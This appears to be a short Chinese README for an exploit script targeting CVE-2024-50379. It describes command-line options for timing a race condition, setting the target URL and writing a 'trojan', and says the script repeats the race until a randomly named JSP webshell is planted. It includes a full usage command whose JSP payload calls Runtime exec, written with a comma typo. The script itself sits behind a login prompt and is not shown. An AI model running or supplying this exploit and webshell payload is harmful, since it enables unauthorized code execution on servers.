CVE-2024-50379-exp# CVE-2024-50379-exp
- -t 条件竞争时间
- -u 域名
- -f 写入木马
测试发现第一次条件竞争时有很大几率会写入失败需要重新再进行一次条件竞争才会写入木马,所以脚本第一次会进行固定6秒条件竞争检测是否写入,没有会再进行用户自定义或者默认的10秒检测,生成的木马为随机md5.jsp
```
python .\CVE-2024-50379.py -u http://192.168.31.33:8888/ -f '123456<%Runtime,getRuntime().exec("calc.exe");%>' -t 10
```

Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view